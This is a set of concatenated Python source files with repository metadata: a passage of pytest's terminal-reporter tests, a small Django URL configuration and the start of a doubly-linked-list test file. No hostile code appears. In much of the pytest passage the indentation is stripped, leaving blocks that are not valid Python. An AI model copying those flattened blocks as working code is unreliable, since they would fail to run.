            def test_one():
                sys.stdout.write('!This is stdout!')
                sys.stderr.write('!This is stderr!')
                logging.warning('!This is a warning log msg!')
                assert False, 'Something failed'
            """
        )
        result = pytester.runpytest("--tb=short")
        result.stdout.fnmatch_lines(
            [
                "!This is stdout!",
                "!This is stderr!",
                "*WARNING*!This is a warning log msg!",
            ]
        )
        result = pytester.runpytest("--show-capture=all", "--tb=short")
        result.stdout.fnmatch_lines(
            [
                "!This is stdout!",
                "!This is stderr!",
                "*WARNING*!This is a warning log msg!",
            ]
        )
        stdout = pytester.runpytest("--show-capture=stdout", "--tb=short").stdout.str()
        assert "!This is stderr!" not in stdout
        assert "!This is stdout!" in stdout
        assert "!This is a warning log msg!" not in stdout
        stdout = pytester.runpytest("--show-capture=stderr", "--tb=short").stdout.str()
        assert "!This is stdout!" not in stdout
        assert "!This is stderr!" in stdout
        assert "!This is a warning log msg!" not in stdout
        stdout = pytester.runpytest("--show-capture=log", "--tb=short").stdout.str()
        assert "!This is stdout!" not in stdout
        assert "!This is stderr!" not in stdout
        assert "!This is a warning log msg!" in stdout
        stdout = pytester.runpytest("--show-capture=no", "--tb=short").stdout.str()
        assert "!This is stdout!" not in stdout
        assert "!This is stderr!" not in stdout
        assert "!This is a warning log msg!" not in stdout

    def test_show_capture_with_teardown_logs(self, pytester: Pytester) -> None:
        """Ensure that the capturing of teardown logs honor --show-capture setting"""
        pytester.makepyfile(
            """
            import logging
            import sys
            import pytest
            @pytest.fixture(scope="function", autouse="True")
            def hook_each_test(request):
                yield
                sys.stdout.write("!stdout!")
                sys.stderr.write("!stderr!")
                logging.warning("!log!")
            def test_func():
                assert False
            """
        )
        result = pytester.runpytest("--show-capture=stdout", "--tb=short").stdout.str()
        assert "!stdout!" in result
        assert "!stderr!" not in result
        assert "!log!" not in result
        result = pytester.runpytest("--show-capture=stderr", "--tb=short").stdout.str()
        assert "!stdout!" not in result
        assert "!stderr!" in result
        assert "!log!" not in result
        result = pytester.runpytest("--show-capture=log", "--tb=short").stdout.str()
        assert "!stdout!" not in result
        assert "!stderr!" not in result
        assert "!log!" in result
        result = pytester.runpytest("--show-capture=no", "--tb=short").stdout.str()
        assert "!stdout!" not in result
        assert "!stderr!" not in result
        assert "!log!" not in result
@pytest.mark.xfail("not hasattr(os, 'dup')")
def test_fdopen_kept_alive_issue124(pytester: Pytester) -> None:
    """A file object wrapping fd 1 kept alive across tests must not break
    capture teardown (issue #124)."""
    pytester.makepyfile(
        """
        import os, sys
        k = []
        def test_open_file_and_keep_alive(capfd):
            stdout = os.fdopen(1, 'w', 1)
            k.append(stdout)
        def test_close_kept_alive_file():
            stdout = k.pop()
            stdout.close()
        """
    )
    pytester.runpytest().stdout.fnmatch_lines(["*2 passed*"])
def test_tbstyle_native_setup_error(pytester: Pytester) -> None:
    """--tb=native renders fixture setup errors as plain Python
    tracebacks (File "...", line N, in func)."""
    pytester.makepyfile(
        """
        import pytest
        @pytest.fixture
        def setup_error_fixture():
            raise Exception("error in exception")
        def test_error_fixture(setup_error_fixture):
            pass
        """
    )
    expected = '*File *test_tbstyle_native_setup_error.py", line *, in setup_error_fixture*'
    result = pytester.runpytest("--tb=native")
    result.stdout.fnmatch_lines([expected])
def test_terminal_summary(pytester: Pytester) -> None:
    """pytest_terminal_summary receives the exit status and may add its
    own sections and lines to the report."""
    pytester.makeconftest(
        """
        def pytest_terminal_summary(terminalreporter, exitstatus):
            w = terminalreporter
            w.section("hello")
            w.line("world")
            w.line("exitstatus: {0}".format(exitstatus))
        """
    )
    summary_run = pytester.runpytest()
    # exitstatus 5: no tests were collected.
    summary_run.stdout.fnmatch_lines(
        """
        *==== hello ====*
        world
        exitstatus: 5
        """
    )
@pytest.mark.filterwarnings("default::UserWarning")
def test_terminal_summary_warnings_are_displayed(pytester: Pytester) -> None:
"""Test that warnings emitted during pytest_terminal_summary are displayed.
(#1305).
"""
pytester.makeconftest(
"""
import warnings
def pytest_terminal_summary(terminalreporter):
warnings.warn(UserWarning('internal warning'))
"""
)
pytester.makepyfile(
"""
def test_failure():
import warnings
warnings.warn("warning_from_" + "test")
assert 0
"""
)
result = pytester.runpytest("-ra")
result.stdout.fnmatch_lines(
[
"*= warnings summary =*",
"*warning_from_test*",
"*= short test summary info =*",
"*= warnings summary (final) =*",
"*conftest.py:3:*internal warning",
"*== 1 failed, 2 warnings in *",
]
)
result.stdout.no_fnmatch_line("*None*")
stdout = result.stdout.str()
assert stdout.count("warning_from_test") == 1
assert stdout.count("=== warnings summary ") == 2
@pytest.mark.filterwarnings("default::UserWarning")
def test_terminal_summary_warnings_header_once(pytester: Pytester) -> None:
pytester.makepyfile(
"""
def test_failure():
import warnings
warnings.warn("warning_from_" + "test")
assert 0
"""
)
result = pytester.runpytest("-ra")
result.stdout.fnmatch_lines(
[
"*= warnings summary =*",
"*warning_from_test*",
"*= short test summary info =*",
"*== 1 failed, 1 warning in *",
]
)
result.stdout.no_fnmatch_line("*None*")
stdout = result.stdout.str()
assert stdout.count("warning_from_test") == 1
assert stdout.count("=== warnings summary ") == 1
@pytest.mark.filterwarnings("default")
def test_terminal_no_summary_warnings_header_once(pytester: Pytester) -> None:
pytester.makepyfile(
"""
def test_failure():
import warnings
warnings.warn("warning_from_" + "test")
assert 0
"""
)
result = pytester.runpytest("--no-summary")
result.stdout.no_fnmatch_line("*= warnings summary =*")
result.stdout.no_fnmatch_line("*= short test summary info =*")
@pytest.fixture(scope="session")
def tr() -> TerminalReporter:
    """Session-scoped TerminalReporter built from a default-initialized config."""
    config = _pytest.config._prepareconfig()
    return TerminalReporter(config)
@pytest.mark.parametrize(
"exp_color, exp_line, stats_arg",
[
# The method under test only cares about the length of each
# dict value, not the actual contents, so tuples of anything
# suffice
# Important statuses -- the highest priority of these always wins
("red", [("1 failed", {"bold": True, "red": True})], {"failed": [1]}),
(
"red",
[
("1 failed", {"bold": True, "red": True}),
("1 passed", {"bold": False, "green": True}),
],
{"failed": [1], "passed": [1]},
),
("red", [("1 error", {"bold": True, "red": True})], {"error": [1]}),
("red", [("2 errors", {"bold": True, "red": True})], {"error": [1, 2]}),
(
"red",
[
("1 passed", {"bold": False, "green": True}),
("1 error", {"bold": True, "red": True}),
],
{"error": [1], "passed": [1]},
),
# (a status that's not known to the code)
("yellow", [("1 weird", {"bold": True, "yellow": True})], {"weird": [1]}),
(
"yellow",
[
("1 passed", {"bold": False, "green": True}),
("1 weird", {"bold": True, "yellow": True}),
],
{"weird": [1], "passed": [1]},
),
("yellow", [("1 warning", {"bold": True, "yellow": True})], {"warnings": [1]}),
(
"yellow",
[
("1 passed", {"bold": False, "green": True}),
("1 warning", {"bold": True, "yellow": True}),
],
{"warnings": [1], "passed": [1]},
),
(
"green",
[("5 passed", {"bold": True, "green": True})],
{"passed": [1, 2, 3, 4, 5]},
),
# "Boring" statuses. These have no effect on the color of the summary
# line. Thus, if *every* test has a boring status, the summary line stays
# at its default color, i.e. yellow, to warn the user that the test run
# produced no useful information
("yellow", [("1 skipped", {"bold": True, "yellow": True})], {"skipped": [1]}),
(
"green",
[
("1 passed", {"bold": True, "green": True}),
("1 skipped", {"bold": False, "yellow": True}),
],
{"skipped": [1], "passed": [1]},
),
(
"yellow",
[("1 deselected", {"bold": True, "yellow": True})],
{"deselected": [1]},
),
(
"green",
[
("1 passed", {"bold": True, "green": True}),
("1 deselected", {"bold": False, "yellow": True}),
],
{"deselected": [1], "passed": [1]},
),
("yellow", [("1 xfailed", {"bold": True, "yellow": True})], {"xfailed": [1]}),
(
"green",
[
("1 passed", {"bold": True, "green": True}),
("1 xfailed", {"bold": False, "yellow": True}),
],
{"xfailed": [1], "passed": [1]},
),
("yellow", [("1 xpassed", {"bold": True, "yellow": True})], {"xpassed": [1]}),
(
"yellow",
[
("1 passed", {"bold": False, "green": True}),
("1 xpassed", {"bold": True, "yellow": True}),
],
{"xpassed": [1], "passed": [1]},
),
# Likewise if no tests were found at all
("yellow", [("no tests ran", {"yellow": True})], {}),
# Test the empty-key special case
("yellow", [("no tests ran", {"yellow": True})], {"": [1]}),
(
"green",
[("1 passed", {"bold": True, "green": True})],
{"": [1], "passed": [1]},
),
# A couple more complex combinations
(
"red",
[
("1 failed", {"bold": True, "red": True}),
("2 passed", {"bold": False, "green": True}),
("3 xfailed", {"bold": False, "yellow": True}),
],
{"passed": [1, 2], "failed": [1], "xfailed": [1, 2, 3]},
),
(
"green",
[
("1 passed", {"bold": True, "green": True}),
("2 skipped", {"bold": False, "yellow": True}),
("3 deselected", {"bold": False, "yellow": True}),
("2 xfailed", {"bold": False, "yellow": True}),
],
{
"passed": [1],
"skipped": [1, 2],
"deselected": [1, 2, 3],
"xfailed": [1, 2],
},
),
],
)
def test_summary_stats(
tr: TerminalReporter,
exp_line: List[Tuple[str, Dict[str, bool]]],
exp_color: str,
stats_arg: Dict[str, List[object]],
) -> None:
tr.stats = stats_arg
# Fake "_is_last_item" to be True.
class fake_session:
testscollected = 0
tr._session = fake_session # type: ignore[assignment]
assert tr._is_last_item
# Reset cache.
tr._main_color = None
print("Based on stats: %s" % stats_arg)
print(f'Expect summary: "{exp_line}"; with color "{exp_color}"')
(line, color) = tr.build_summary_stats_line()
print(f'Actually got: "{line}"; with color "{color}"')
assert line == exp_line
assert color == exp_color
def test_skip_counting_towards_summary(tr: TerminalReporter) -> None:
    """Reports with count_towards_summary=False are excluded from the stats line."""
    class DummyReport(BaseReport):
        count_towards_summary = True
    r1 = DummyReport()
    r2 = DummyReport()
    tr.stats = {"failed": (r1, r2)}
    tr._main_color = None  # reset the cached color so it is recomputed
    res = tr.build_summary_stats_line()
    assert res == ([("2 failed", {"bold": True, "red": True})], "red")
    r1.count_towards_summary = False
    tr.stats = {"failed": (r1, r2)}
    tr._main_color = None  # reset again after changing the report
    res = tr.build_summary_stats_line()
    assert res == ([("1 failed", {"bold": True, "red": True})], "red")
class TestClassicOutputStyle:
"""Ensure classic output style works as expected (#3883)"""
@pytest.fixture
def test_files(self, pytester: Pytester) -> None:
pytester.makepyfile(
**{
"test_one.py": "def test_one(): pass",
"test_two.py": "def test_two(): assert 0",
"sub/test_three.py": """
def test_three_1(): pass
def test_three_2(): assert 0
def test_three_3(): pass
""",
}
)
def test_normal_verbosity(self, pytester: Pytester, test_files) -> None:
result = pytester.runpytest("-o", "console_output_style=classic")
result.stdout.fnmatch_lines(
[
"test_one.py .",
"test_two.py F",
f"sub{os.sep}test_three.py .F.",
"*2 failed, 3 passed in*",
]
)
def test_verbose(self, pytester: Pytester, test_files) -> None:
result = pytester.runpytest("-o", "console_output_style=classic", "-v")
result.stdout.fnmatch_lines(
[
"test_one.py::test_one PASSED",
"test_two.py::test_two FAILED",
f"sub{os.sep}test_three.py::test_three_1 PASSED",
f"sub{os.sep}test_three.py::test_three_2 FAILED",
f"sub{os.sep}test_three.py::test_three_3 PASSED",
"*2 failed, 3 passed in*",
]
)
def test_quiet(self, pytester: Pytester, test_files) -> None:
result = pytester.runpytest("-o", "console_output_style=classic", "-q")
result.stdout.fnmatch_lines([".F.F.", "*2 failed, 3 passed in*"])
class TestProgressOutputStyle:
@pytest.fixture
def many_tests_files(self, pytester: Pytester) -> None:
pytester.makepyfile(
test_bar="""
import pytest
@pytest.mark.parametrize('i', range(10))
def test_bar(i): pass
""",
test_foo="""
import pytest
@pytest.mark.parametrize('i', range(5))
def test_foo(i): pass
""",
test_foobar="""
import pytest
@pytest.mark.parametrize('i', range(5))
def test_foobar(i): pass
""",
)
def test_zero_tests_collected(self, pytester: Pytester) -> None:
"""Some plugins (testmon for example) might issue pytest_runtest_logreport without any tests being
actually collected (#2971)."""
pytester.makeconftest(
"""
def pytest_collection_modifyitems(items, config):
from _pytest.runner import CollectReport
for node_id in ('nodeid1', 'nodeid2'):
rep = CollectReport(node_id, 'passed', None, None)
rep.when = 'passed'
rep.duration = 0.1
config.hook.pytest_runtest_logreport(report=rep)
"""
)
output = pytester.runpytest()
output.stdout.no_fnmatch_line("*ZeroDivisionError*")
output.stdout.fnmatch_lines(["=* 2 passed in *="])
def test_normal(self, many_tests_files, pytester: Pytester) -> None:
output = pytester.runpytest()
output.stdout.re_match_lines(
[
r"test_bar.py \.{10} \s+ \[ 50%\]",
r"test_foo.py \.{5} \s+ \[ 75%\]",
r"test_foobar.py \.{5} \s+ \[100%\]",
]
)
def test_colored_progress(
self, pytester: Pytester, monkeypatch, color_mapping
) -> None:
monkeypatch.setenv("PY_COLORS", "1")
pytester.makepyfile(
test_axfail="""
import pytest
@pytest.mark.xfail
def test_axfail(): assert 0
""",
test_bar="""
import pytest
@pytest.mark.parametrize('i', range(10))
def test_bar(i): pass
""",
test_foo="""
import pytest
import warnings
@pytest.mark.parametrize('i', range(5))
def test_foo(i):
warnings.warn(DeprecationWarning("collection"))
pass
""",
test_foobar="""
import pytest
@pytest.mark.parametrize('i', range(5))
def test_foobar(i): raise ValueError()
""",
)
result = pytester.runpytest()
result.stdout.re_match_lines(
color_mapping.format_for_rematch(
[
r"test_axfail.py {yellow}x{reset}{green} \s+ \[ 4%\]{reset}",
r"test_bar.py ({green}\.{reset}){{10}}{green} \s+ \[ 52%\]{reset}",
r"test_foo.py ({green}\.{reset}){{5}}{yellow} \s+ \[ 76%\]{reset}",
r"test_foobar.py ({red}F{reset}){{5}}{red} \s+ \[100%\]{reset}",
]
)
)
# Only xfail should have yellow progress indicator.
result = pytester.runpytest("test_axfail.py")
result.stdout.re_match_lines(
color_mapping.format_for_rematch(
[
r"test_axfail.py {yellow}x{reset}{yellow} \s+ \[100%\]{reset}",
r"^{yellow}=+ ({yellow}{bold}|{bold}{yellow})1 xfailed{reset}{yellow} in ",
]
)
)
def test_count(self, many_tests_files, pytester: Pytester) -> None:
pytester.makeini(
"""
[pytest]
console_output_style = count
"""
)
output = pytester.runpytest()
output.stdout.re_match_lines(
[
r"test_bar.py \.{10} \s+ \[10/20\]",
r"test_foo.py \.{5} \s+ \[15/20\]",
r"test_foobar.py \.{5} \s+ \[20/20\]",
]
)
def test_verbose(self, many_tests_files, pytester: Pytester) -> None:
output = pytester.runpytest("-v")
output.stdout.re_match_lines(
[
r"test_bar.py::test_bar\[0\] PASSED \s+ \[ 5%\]",
r"test_foo.py::test_foo\[4\] PASSED \s+ \[ 75%\]",
r"test_foobar.py::test_foobar\[4\] PASSED \s+ \[100%\]",
]
)
def test_verbose_count(self, many_tests_files, pytester: Pytester) -> None:
pytester.makeini(
"""
[pytest]
console_output_style = count
"""
)
output = pytester.runpytest("-v")
output.stdout.re_match_lines(
[
r"test_bar.py::test_bar\[0\] PASSED \s+ \[ 1/20\]",
r"test_foo.py::test_foo\[4\] PASSED \s+ \[15/20\]",
r"test_foobar.py::test_foobar\[4\] PASSED \s+ \[20/20\]",
]
)
def test_xdist_normal(
self, many_tests_files, pytester: Pytester, monkeypatch
) -> None:
pytest.importorskip("xdist")
monkeypatch.delenv("PYTEST_DISABLE_PLUGIN_AUTOLOAD", raising=False)
output = pytester.runpytest("-n2")
output.stdout.re_match_lines([r"\.{20} \s+ \[100%\]"])
def test_xdist_normal_count(
self, many_tests_files, pytester: Pytester, monkeypatch
) -> None:
pytest.importorskip("xdist")
monkeypatch.delenv("PYTEST_DISABLE_PLUGIN_AUTOLOAD", raising=False)
pytester.makeini(
"""
[pytest]
console_output_style = count
"""
)
output = pytester.runpytest("-n2")
output.stdout.re_match_lines([r"\.{20} \s+ \[20/20\]"])
def test_xdist_verbose(
self, many_tests_files, pytester: Pytester, monkeypatch
) -> None:
pytest.importorskip("xdist")
monkeypatch.delenv("PYTEST_DISABLE_PLUGIN_AUTOLOAD", raising=False)
output = pytester.runpytest("-n2", "-v")
output.stdout.re_match_lines_random(
[
r"\[gw\d\] \[\s*\d+%\] PASSED test_bar.py::test_bar\[1\]",
r"\[gw\d\] \[\s*\d+%\] PASSED test_foo.py::test_foo\[1\]",
r"\[gw\d\] \[\s*\d+%\] PASSED test_foobar.py::test_foobar\[1\]",
]
)
output.stdout.fnmatch_lines_random(
[
line.translate(TRANS_FNMATCH)
for line in [
"test_bar.py::test_bar[0] ",
"test_foo.py::test_foo[0] ",
"test_foobar.py::test_foobar[0] ",
"[gw?] [ 5%] PASSED test_*[?] ",
"[gw?] [ 10%] PASSED test_*[?] ",
"[gw?] [ 55%] PASSED test_*[?] ",
"[gw?] [ 60%] PASSED test_*[?] ",
"[gw?] [ 95%] PASSED test_*[?] ",
"[gw?] [100%] PASSED test_*[?] ",
]
]
)
def test_capture_no(self, many_tests_files, pytester: Pytester) -> None:
output = pytester.runpytest("-s")
output.stdout.re_match_lines(
[r"test_bar.py \.{10}", r"test_foo.py \.{5}", r"test_foobar.py \.{5}"]
)
output = pytester.runpytest("--capture=no")
output.stdout.no_fnmatch_line("*%]*")
class TestProgressWithTeardown:
"""Ensure we show the correct percentages for tests that fail during teardown (#3088)"""
@pytest.fixture
def contest_with_teardown_fixture(self, pytester: Pytester) -> None:
pytester.makeconftest(
"""
import pytest
@pytest.fixture
def fail_teardown():
yield
assert False
"""
)
@pytest.fixture
def many_files(self, pytester: Pytester, contest_with_teardown_fixture) -> None:
pytester.makepyfile(
test_bar="""
import pytest
@pytest.mark.parametrize('i', range(5))
def test_bar(fail_teardown, i):
pass
""",
test_foo="""
import pytest
@pytest.mark.parametrize('i', range(15))
def test_foo(fail_teardown, i):
pass
""",
)
def test_teardown_simple(
self, pytester: Pytester, contest_with_teardown_fixture
) -> None:
pytester.makepyfile(
"""
def test_foo(fail_teardown):
pass
"""
)
output = pytester.runpytest()
output.stdout.re_match_lines([r"test_teardown_simple.py \.E\s+\[100%\]"])
def test_teardown_with_test_also_failing(
self, pytester: Pytester, contest_with_teardown_fixture
) -> None:
pytester.makepyfile(
"""
def test_foo(fail_teardown):
assert 0
"""
)
output = pytester.runpytest("-rfE")
output.stdout.re_match_lines(
[
r"test_teardown_with_test_also_failing.py FE\s+\[100%\]",
"FAILED test_teardown_with_test_also_failing.py::test_foo - assert 0",
"ERROR test_teardown_with_test_also_failing.py::test_foo - assert False",
]
)
def test_teardown_many(self, pytester: Pytester, many_files) -> None:
output = pytester.runpytest()
output.stdout.re_match_lines(
[r"test_bar.py (\.E){5}\s+\[ 25%\]", r"test_foo.py (\.E){15}\s+\[100%\]"]
)
def test_teardown_many_verbose(
self, pytester: Pytester, many_files, color_mapping
) -> None:
result = pytester.runpytest("-v")
result.stdout.fnmatch_lines(
color_mapping.format_for_fnmatch(
[
"test_bar.py::test_bar[0] PASSED * [ 5%]",
"test_bar.py::test_bar[0] ERROR * [ 5%]",
"test_bar.py::test_bar[4] PASSED * [ 25%]",
"test_foo.py::test_foo[14] PASSED * [100%]",
"test_foo.py::test_foo[14] ERROR * [100%]",
"=* 20 passed, 20 errors in *",
]
)
)
def test_xdist_normal(self, many_files, pytester: Pytester, monkeypatch) -> None:
pytest.importorskip("xdist")
monkeypatch.delenv("PYTEST_DISABLE_PLUGIN_AUTOLOAD", raising=False)
output = pytester.runpytest("-n2")
output.stdout.re_match_lines([r"[\.E]{40} \s+ \[100%\]"])
def test_skip_reasons_folding() -> None:
    """Skip reports sharing one longrepr collapse into a single folded entry."""
    path = "xyz"
    lineno = 3
    message = "justso"
    longrepr = (path, lineno, message)

    class X:
        pass

    def make_skip_report(when):
        # Build a bare stand-in object carrying only the attributes
        # _folded_skips reads.
        rep = cast(CollectReport, X())
        rep.when = when
        rep.skipped = True  # type: ignore[misc]
        rep.longrepr = longrepr
        return rep

    reports = [
        make_skip_report("execute"),
        make_skip_report("execute"),
        # a collection report folds together with execution reports
        make_skip_report("collect"),
    ]
    values = _folded_skips(Path.cwd(), reports)
    assert len(values) == 1
    num, fspath, lineno_, reason = values[0]
    assert num == 3
    assert fspath == path
    assert lineno_ == lineno
    assert reason == message
def test_line_with_reprcrash(monkeypatch: MonkeyPatch) -> None:
mocked_verbose_word = "FAILED"
mocked_pos = "some::nodeid"
def mock_get_pos(*args):
return mocked_pos
monkeypatch.setattr(_pytest.terminal, "_get_pos", mock_get_pos)
class config:
pass
class rep:
def _get_verbose_word(self, *args):
return mocked_verbose_word
class longrepr:
class reprcrash:
pass
def check(msg, width, expected):
__tracebackhide__ = True
if msg:
rep.longrepr.reprcrash.message = msg # type: ignore
actual = _get_line_with_reprcrash_message(config, rep(), width) # type: ignore
assert actual == expected
if actual != f"{mocked_verbose_word} {mocked_pos}":
assert len(actual) <= width
assert wcswidth(actual) <= width
# AttributeError with message
check(None, 80, "FAILED some::nodeid")
check("msg", 80, "FAILED some::nodeid - msg")
check("msg", 3, "FAILED some::nodeid")
check("msg", 24, "FAILED some::nodeid")
check("msg", 25, "FAILED some::nodeid - msg")
check("some longer msg", 24, "FAILED some::nodeid")
check("some longer msg", 25, "FAILED some::nodeid - ...")
check("some longer msg", 26, "FAILED some::nodeid - s...")
check("some\nmessage", 25, "FAILED some::nodeid - ...")
check("some\nmessage", 26, "FAILED some::nodeid - some")
check("some\nmessage", 80, "FAILED some::nodeid - some")
# Test unicode safety.
check("🉐🉐🉐🉐🉐\n2nd line", 25, "FAILED some::nodeid - ...")
check("🉐🉐🉐🉐🉐\n2nd line", 26, "FAILED some::nodeid - ...")
check("🉐🉐🉐🉐🉐\n2nd line", 27, "FAILED some::nodeid - 🉐...")
check("🉐🉐🉐🉐🉐\n2nd line", 28, "FAILED some::nodeid - 🉐...")
check("🉐🉐🉐🉐🉐\n2nd line", 29, "FAILED some::nodeid - 🉐🉐...")
# NOTE: constructed, not sure if this is supported.
mocked_pos = "nodeid::🉐::withunicode"
check("🉐🉐🉐🉐🉐\n2nd line", 29, "FAILED nodeid::🉐::withunicode")
check("🉐🉐🉐🉐🉐\n2nd line", 40, "FAILED nodeid::🉐::withunicode - 🉐🉐...")
check("🉐🉐🉐🉐🉐\n2nd line", 41, "FAILED nodeid::🉐::withunicode - 🉐🉐...")
check("🉐🉐🉐🉐🉐\n2nd line", 42, "FAILED nodeid::🉐::withunicode - 🉐🉐🉐...")
check("🉐🉐🉐🉐🉐\n2nd line", 80, "FAILED nodeid::🉐::withunicode - 🉐🉐🉐🉐🉐")
@pytest.mark.parametrize(
    "seconds, expected",
    [
        (10.0, "10.00s"),
        (10.34, "10.34s"),
        (59.99, "59.99s"),
        # From one minute on, an H:MM:SS breakdown is appended.
        (60.55, "60.55s (0:01:00)"),
        (123.55, "123.55s (0:02:03)"),
        (60 * 60 + 0.5, "3600.50s (1:00:00)"),
    ],
)
def test_format_session_duration(seconds, expected):
    """format_session_duration renders seconds, plus H:MM:SS for >= 60s."""
    from _pytest.terminal import format_session_duration
    assert format_session_duration(seconds) == expected
def test_collecterror(pytester: Pytester) -> None:
    """A collection-time SyntaxError is reported and interrupts the session."""
    path = pytester.makepyfile("raise SyntaxError()")
    run = pytester.runpytest("-ra", str(path))
    expected = [
        "collected 0 items / 1 error",
        "*= ERRORS =*",
        "*_ ERROR collecting test_collecterror.py _*",
        "E SyntaxError: *",
        "*= short test summary info =*",
        "ERROR test_collecterror.py",
        "*! Interrupted: 1 error during collection !*",
        "*= 1 error in *",
    ]
    run.stdout.fnmatch_lines(expected)
def test_no_summary_collecterror(pytester: Pytester) -> None:
    """--no-summary suppresses the ERRORS section for collection errors."""
    path = pytester.makepyfile("raise SyntaxError()")
    run = pytester.runpytest("-ra", "--no-summary", str(path))
    run.stdout.no_fnmatch_line("*= ERRORS =*")
def test_via_exec(pytester: Pytester) -> None:
    """Tests defined via exec() are collected and shown with an '<- <string>' origin."""
    path = pytester.makepyfile("exec('def test_via_exec(): pass')")
    run = pytester.runpytest(str(path), "-vv")
    expected = [
        "test_via_exec.py::test_via_exec <- <string> PASSED*",
        "*= 1 passed in *",
    ]
    run.stdout.fnmatch_lines(expected)
class TestCodeHighlight:
def test_code_highlight_simple(self, pytester: Pytester, color_mapping) -> None:
pytester.makepyfile(
"""
def test_foo():
assert 1 == 10
"""
)
result = pytester.runpytest("--color=yes")
result.stdout.fnmatch_lines(
color_mapping.format_for_fnmatch(
[
" {kw}def{hl-reset} {function}test_foo{hl-reset}():",
"> {kw}assert{hl-reset} {number}1{hl-reset} == {number}10{hl-reset}",
"{bold}{red}E assert 1 == 10{reset}",
]
)
)
def test_code_highlight_continuation(
self, pytester: Pytester, color_mapping
) -> None:
pytester.makepyfile(
"""
def test_foo():
print('''
'''); assert 0
"""
)
result = pytester.runpytest("--color=yes")
result.stdout.fnmatch_lines(
color_mapping.format_for_fnmatch(
[
" {kw}def{hl-reset} {function}test_foo{hl-reset}():",
" {print}print{hl-reset}({str}'''{hl-reset}{str}{hl-reset}",
"> {str} {hl-reset}{str}'''{hl-reset}); {kw}assert{hl-reset} {number}0{hl-reset}",
"{bold}{red}E assert 0{reset}",
]
)
)
def test_code_highlight_custom_theme(
self, pytester: Pytester, color_mapping, monkeypatch: MonkeyPatch
) -> None:
pytester.makepyfile(
"""
def test_foo():
assert 1 == 10
"""
)
monkeypatch.setenv("PYTEST_THEME", "solarized-dark")
monkeypatch.setenv("PYTEST_THEME_MODE", "dark")
result = pytester.runpytest("--color=yes")
result.stdout.fnmatch_lines(
color_mapping.format_for_fnmatch(
[
" {kw}def{hl-reset} {function}test_foo{hl-reset}():",
"> {kw}assert{hl-reset} {number}1{hl-reset} == {number}10{hl-reset}",
"{bold}{red}E assert 1 == 10{reset}",
]
)
)
def test_code_highlight_invalid_theme(
self, pytester: Pytester, color_mapping, monkeypatch: MonkeyPatch
) -> None:
pytester.makepyfile(
"""
def test_foo():
assert 1 == 10
"""
)
monkeypatch.setenv("PYTEST_THEME", "invalid")
result = pytester.runpytest_subprocess("--color=yes")
result.stderr.fnmatch_lines(
"ERROR: PYTEST_THEME environment variable had an invalid value: 'invalid'. "
"Only valid pygment styles are allowed."
)
def test_code_highlight_invalid_theme_mode(
self, pytester: Pytester, color_mapping, monkeypatch: MonkeyPatch
) -> None:
pytester.makepyfile(
"""
def test_foo():
assert 1 == 10
"""
)
monkeypatch.setenv("PYTEST_THEME_MODE", "invalid")
result = pytester.runpytest_subprocess("--color=yes")
result.stderr.fnmatch_lines(
"ERROR: PYTEST_THEME_MODE environment variable had an invalid value: 'invalid'. "
"The only allowed values are 'dark' and 'light'."
)
def test_raw_skip_reason_skipped() -> None:
    """The 'Skipped: ' prefix is stripped from a skipped report's reason."""
    fake_report = SimpleNamespace(
        skipped=True,
        longrepr=("xyz", 3, "Skipped: Just so"),
    )
    assert _get_raw_skip_reason(cast(TestReport, fake_report)) == "Just so"
def test_raw_skip_reason_xfail() -> None:
    """The 'reason: ' prefix is stripped from an xfail report's reason."""
    fake_report = SimpleNamespace(wasxfail="reason: To everything there is a season")
    assert (
        _get_raw_skip_reason(cast(TestReport, fake_report))
        == "To everything there is a season"
    )
def test_format_trimmed() -> None:
    """_format_trimmed inserts the message whole when it fits, else ellipsizes."""
    msg = "unconditional skip"
    # Exactly enough room for format chars + message: inserted verbatim.
    assert _format_trimmed(" ({}) ", msg, len(msg) + 4) == " (unconditional skip) "
    # One character short: message is trimmed and '...' appended.
    assert _format_trimmed(" ({}) ", msg, len(msg) + 3) == " (unconditional ...) "
| {
"content_hash": "4dae1bd7460c5b9a9f49a1b2448f989b",
"timestamp": "",
"source": "github",
"line_count": 2545,
"max_line_length": 107,
"avg_line_length": 33.17996070726915,
"alnum_prop": 0.509763982804969,
"repo_name": "Akasurde/pytest",
"id": "f0e58e5b4c4a0023c7c01ccc7e75d2063c75bc6a",
"size": "84665",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "testing/test_terminal.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Gherkin",
"bytes": "192"
},
{
"name": "Python",
"bytes": "2594260"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import, unicode_literals
from django.conf.urls import url
from bizsprint.users import views
# User-facing routes, mapped to the class-based views in bizsprint.users.views.
urlpatterns = [
    # /            -> list all users
    url(r'^$', views.UserListView.as_view(), name='list'),
    # /~redirect/  -> redirect to the current user's detail page
    url(r'^~redirect/$', views.UserRedirectView.as_view(), name='redirect'),
    # /<username>/ -> detail page for one user
    url(r'^(?P<username>[\w.@+-]+)/$', views.UserDetailView.as_view(), name='detail'),
    # /~update/    -> edit the current user's profile
    url(r'^~update/$', views.UserUpdateView.as_view(), name='update'),
]
| {
"content_hash": "fd58cb3878c249649a01229e18c73382",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 56,
"avg_line_length": 22,
"alnum_prop": 0.5818181818181818,
"repo_name": "DJMedhaug/BizSprint",
"id": "0fa24403e3e6a39879862660b0369e3296ec2ce0",
"size": "794",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bizsprint/users/urls.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "1242519"
},
{
"name": "HTML",
"bytes": "250009"
},
{
"name": "JavaScript",
"bytes": "965426"
},
{
"name": "PHP",
"bytes": "390755"
},
{
"name": "Python",
"bytes": "129777"
},
{
"name": "Shell",
"bytes": "3675"
}
],
"symlink_target": ""
} |
"""Testing dll.py."""
import pytest
from data_structures.dll import DoublyLinkedList, DoubleNode
@pytest.fixture
def new_dll():
    """Return a freshly constructed, empty DoublyLinkedList."""
    return DoublyLinkedList()
@pytest.fixture
def init_dll():
    """Return a DoublyLinkedList pre-populated by pushing 1, 2, 3 (head is 3)."""
    dll = DoublyLinkedList()
    dll.push(1)
    dll.push(2)
    dll.push(3)
    return dll
def test_init(new_dll):
"""Test initialization of empty doubly linked list."""
assert new_dll.head is None and new_dll.tail is None
def test_push_to_empty(new_dll):
"""Test push to empty dll."""
new_dll.push(21)
assert new_dll.head.val == 21 and new_dll.head.next is None
def test_new_node(new_dll):
"""Test if new node is created."""
node = DoubleNode(27)
